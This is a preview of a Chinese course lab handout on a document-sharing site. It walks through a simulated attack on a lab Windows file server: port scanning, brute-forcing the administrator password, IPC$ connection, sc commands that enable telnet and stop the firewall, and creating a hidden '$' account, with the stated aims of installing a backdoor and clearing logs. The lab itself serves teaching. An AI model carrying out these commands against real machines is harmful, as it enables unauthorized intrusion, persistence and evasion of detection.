实验五-模拟黑客攻击.doc

上传人:sk****8 文档编号:2213469 上传时间:2019-05-02 格式:DOC 页数:29 大小:2.54MB
下载 相关 举报
实验五-模拟黑客攻击.doc_第1页
第1页 / 共29页
实验五-模拟黑客攻击.doc_第2页
第2页 / 共29页
实验五-模拟黑客攻击.doc_第3页
第3页 / 共29页
实验五-模拟黑客攻击.doc_第4页
第4页 / 共29页
实验五-模拟黑客攻击.doc_第5页
第5页 / 共29页
点击查看更多>>
资源描述

1、1实验五 模拟黑客攻击实验环境:本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了 ,启动了防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。ABV M N e t 2文 件 服 务 器I P 1 . 1 . 1 . 1 / 8客 户 机I P 1 . 1 . 1 . 2 / 82需求描述: 扫描目标计算机 获得管理员权限 安装后门 清除攻击记录实验步骤:1、扫描目标计算机a) 在 B 计算机上使用扫描软件扫描目标计算机 A,确定开放的端口,判断操作系统的类型。b) 扫描软件推荐使用或流光。X-SCAN:34使用流光:打开流光主界面-右击 IPC

2、主机-编辑- 添加目标主机主机添加完后,生成字典-工具- 字典工具 -黑客字典III5生成字典右击目标添加的主机-探测- 探测所有 IPC$远程登录6配置字典探测报告72、获得管理员权限a) 根据扫描结果,尝试暴力破解管理员账户的密码。b) 、流光、等软件都提供了暴力破解功能。破解成功后会自动生成报告。3、入侵目标计算机a) 使用管理员的账户建立链接,命令为net use 1.1.1.1ipc$ 123456 /user:administrator。b) 使用 SC 命令获取目标计算机的所有服务列表,并保存在本地,命令为“sc 1.1.1.1 query type= service state

3、= all c:1.txt”8c) 打开 1.txt 文件,找到 telnet,确认 telnet 服务的状态。d) 去除 telnet 服务的禁用状态,设置为自动运行,命令为“sc 1.1.1.1 config tlntsvr start= auto”。然后启用 telnet 服务,命令为“sc 1.1.1.1 start tlntsvr” 。e) 停用目标计算机的 windows 防火,命令为“sc 1.1.1.1 stop sharedaccess”9f) 确认目标计算机启用了远程注册表服务,命令为“sc 1.1.1.1 qc remoteregistry”,如果服务为停止状态,则将其启动。4、添加隐藏账户a) 建立 telnet 连接,管理目标计算机,命令为“telnet 1.1.1.1”,连接成功后输入管理员的账户名和密码10b) 通过 telnet,在目标计算机上建立隐藏账户,命令为“net user yt$ 111 /add”,其中“$”符号用于在命令行里隐藏账户,但是在图形化管理工具里该账户还是可见的。c) 在本地运行“regedt32” ,在“注册表编辑器”中选择 “文件”“连接网络注册表” 。

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 教育教学资料库 > 课程笔记

Copyright © 2018-2021 Wenke99.com All rights reserved

工信部备案号浙ICP备20026746号-2  

公安局备案号:浙公网安备33038302330469号

本站为C2C交文档易平台,即用户上传的文档直接卖给下载用户,本站只是网络服务中间平台,所有原创文档下载所得归上传人所有,若您发现上传作品侵犯了您的权利,请立刻联系网站客服并提供证据,平台将在3个工作日内予以改正。